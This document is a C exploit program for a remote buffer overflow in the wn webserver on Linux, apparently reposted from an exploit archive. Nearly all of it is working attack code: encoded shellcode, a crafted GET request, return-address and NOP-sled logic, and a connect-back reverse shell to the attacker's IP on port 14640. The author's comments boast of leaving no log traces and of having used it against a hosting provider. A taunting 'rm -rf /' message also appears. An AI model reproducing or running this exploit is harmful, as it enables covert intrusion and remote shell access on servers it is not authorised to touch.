Remote buffer overflow exploit for the wn webserver for linux version v2.0.9 and below.
54f424cc1122a2ea6b28734c7d2c58d1f67fa6e799266a8ebc622e21926ae9c0/*
* USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
* RESPONSIBILITY FOR THE RESULTS
*/
/*
* Bug discovered by: Dvorak (dvorak@hit2000.org)
* Exploit by: Dvorak (dvorak@synnergy.net)
* With help from: Bounce (is that your official nick?)
* Will work against: wn webserver under Linux.
* Exploit build at: CCC (chaos communication camp, www.ccc.de)
* Exploit first used: Hit2000 (www.hit2000.org)
*
* (against a dutch hosting provider to show it was possible)
* I got a t-shirt from them; great marketing trick ;)
*
* Greets to: Hit2000 Crew (www.hit2000.org)
* : Synnergy Networks (www.synnergy.net)
* : emphyrio (wanneer ga je weer meer met security doen?)
* : shevek (Building a remote AIX (4.3.2) ftpd exploit rocks!)
* : bivak (niet chatten, leren!!)
* : #hit2000, #synnergy, #phreak.nl (irc.xs4all.nl)
*
*
* New version of wn-server: hopf.math.nwu.edu
*
* Check these sites out:
* www.hackernews.com
* www.securityfocus.com
* www.l0pht.com
*/
/*
* Remote exploit against the wn webserver
* (2.0.x, x < 9?)
* (1.*)
* (2.1.y, y < ?????)
* The bug (ab)used is patcht in the newest versions
*
* John(@matht.nwu.edu), thanks for the quick response
*/
/*
* This exploit leaves NO traces in the logs
* It will cast a shell with uid = uid of webserver (nobody typical)
* to the ip-address specified with the -d option port 14640
* so you'd better be listening there (use netcat (nc) it is absolutly
* the number 1 networking tool, ok fragrouter and nmap are cool too)
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
/*
* This is weird shellcode. Its normal shellcode which had every byte
* split into 2 pieces which were or-ed with 0x80 to maken sure the
* whole range of bits was allowed by wn.
*
* The scrambled shellcode is highly ineffecient, it can be cut down
* to approximatly 30% of its current size of you want to do it:
* Do IT
*
* For more info and tools: dvorak@hit2000.org, dvorak@synnergy.net
*/
char shellcode[] =
"\xeb\x2c\x5f\x89\xfe\x31\xc9\x89\xcb\x80\xc1\x01\x89\xcd\x89\xd9\x80\xc1\xff"
"\x90\x90\x8a\x34\x1e\x01\xee\x8a\x14\x1e\x01\xee\xc0\xe2\x04\x66\xc1\xfa\x04"
"\x88\x17\x01\xef\xe2\xe9\xeb\x05\xe8\xcf\xff\xff\xff\x83\x81\x8d\x8b\x88\x89"
"\x8d\x88\x80\x84\x86\x86\x88\x80\x8c\x83\x80\x81\x88\x89\x8d\x89\x88\x89"
"\x8c\x8a\x8e\x8b\x84\x81\x85\x8e\x88\x89\x84\x8e\x80\x88\x88\x80\x8c\x81"
"\x80\x81\x88\x89\x84\x8e\x80\x84\x88\x80\x8c\x81\x80\x84\x88\x89\x84\x8e"
"\x80\x8c\x88\x8d\x84\x8e\x80\x84\x8c\x8d\x88\x80\x88\x89\x80\x86\x83\x81"
"\x8c\x89\x88\x80\x8c\x81\x80\x82\x86\x86\x88\x89\x84\x8e\x80\x8c\x86\x86"
"\x88\x89\x84\x8e\x80\x8e\x88\x80\x8c\x81\x80\x8e\x86\x86\x88\x89\x84\x8e"
"\x80\x88\x86\x86\x8b\x89\x83\x89\x83\x80\x86\x86\x88\x89\x84\x8e\x80\x8e"
"\x88\x8d\x84\x86\x80\x8c\x88\x89\x84\x86\x80\x84\x83\x81\x8c\x89\x8b\x81"
"\x80\x83\x88\x89\x8c\x8a\x8e\x8b\x80\x82\x8e\x8b\x84\x89\x88\x89\x8c\x8b"
"\x88\x89\x8f\x81\x83\x81\x8c\x80\x80\x84\x86\x86\x8c\x8d\x88\x80\x83\x81"
"\x8c\x80\x88\x89\x8c\x81\x80\x84\x83\x8f\x88\x89\x8c\x82\x88\x8b\x81\x8e"
"\x8c\x8d\x88\x80\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80"
"\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80\x83\x81\x8c\x80"
"\x88\x89\x84\x86\x81\x80\x88\x88\x84\x86\x81\x8b\x88\x8d\x84\x86\x81\x84"
"\x88\x89\x84\x86\x80\x8c\x83\x81\x8c\x80\x80\x84\x80\x8b\x88\x8d\x85\x8e"
"\x81\x84\x88\x8d\x84\x8e\x80\x8c\x88\x8d\x85\x86\x81\x80\x8c\x8d\x88\x80"
"\x83\x81\x8c\x80\x84\x80\x88\x89\x8c\x83\x84\x83\x8c\x8d\x88\x80\x8e\x88"
"\x86\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x82\x8e\x86\x81\x86\x81\x86\x81\x86\x81"
"\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81"
"\x83\x89\x83\x80\x99\x99\x99\x99\x99\x99\x99\x99\x82\x8f\x86\x82\x86\x89"
"\x86\x8e\x82\x8f\x87\x83\x86\x88";
/*
* Most of the hardcoded values here can be changed on the command line
* but KNOW what you are doing or you will leave traces of your
* activity in the log files
*/
void main(int argc, char *argv[])
{
int num_amps = 520; /* Number of &'s to use. iIf you read
* the source of wn you'll know the
* reason for this
*/
int post_nops = 20;
int num_nops = 400;
int align = 0;
int ret = 0xbffe5dd4;
unsigned long my_addr = 0;
int i, shl_len;
char opt;
while ((opt = getopt(argc, argv, "n:a:R:d:h")) != EOF)
switch (opt)
{
case 'd':
my_addr = (inet_addr(optarg));
break;
case 'a':
align = atoi(optarg);
break;
case 'R':
ret = strtoul(optarg, NULL, 0);
break;
case 'n':
num_nops = atoi(optarg);
break;
default:
fprintf(stderr, "Use: wn_exploit -d <the ip of the listening nc> | nc -v victim 80\n");
fprintf(stderr, "on the listening host: nc -v -s <seem ip as above> -l -p 14640\n");
fprintf(stderr, "Extended use:\n");
fprintf(stderr, "\t -R 0xaddr\treturn address to use\n");
fprintf(stderr, "\t if you want to tweak more:\n");
fprintf(stderr, "\t read the source of wn_exploit of mail me.\n");
fprintf(stderr, "\t dvorak@hit2000.org // dvorak@synnergy.net\n");
exit(2);
}
if (!my_addr) {
fprintf(stderr, "Hmm lets see what does system(\"rm -rf / & \") do to your machine?\n");
fprintf(stderr, "\n\nShut The Fuck Up You Stupid Looser (STFUYSL)\n");
exit(0);
}
fprintf(stderr, "wn remote exploit by dvorak(@hit2000.org // @synnergy.net)\n");
printf("GET /s=c?");
for (i = 0; i < num_amps; i++) printf("&");
shl_len = 0;
while (shellcode[shl_len])
if (shellcode[shl_len] == '\x99') {
printf("%c", 0x80 + ((my_addr & 0xf0) >> 4));
printf("%c", 0x80 + (my_addr & 0x0f));
my_addr >>= 8;
shl_len += 2;
} else
printf("%c", shellcode[shl_len++]);
/*
* Thats correct, we place the nops AFTER the shellcode
* and add a jmp instruction after the nops which makes a
* relative jump back to the shellcode
*
* Want to know why? mail me.
*/
num_nops = 4104 - 4 - (5*num_amps) - shl_len - 5 - post_nops;
for (i = 0; i < num_nops; i++) printf("%c", 0x90);
i = -(shl_len + num_nops + 5);
printf("%c", 0xe9);
printf("%c", (i & 0xff));
printf("%c", (i >> 8) & 0xff);
printf("%c", (i >> 16) &0xff);
printf("%c", (i >> 24) & 0xff);
/*
* post_nops are required because else the jmp instruction added
* above are overwritten by stack operations in the wn daemon
*/
for (i = 0; i < post_nops; i++) printf("%c", 0x90);
for (i = 0; i < align; i++) printf("q");
printf("%c%c%c%c", ret & 0xff, (ret >> 8) &0xff,
(ret >> 16) & 0xff, (ret >> 24) & 0xff);
printf("\r\n\r\n");
fflush(stdout);
}
/* www.hack.co.za [20 July]*/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed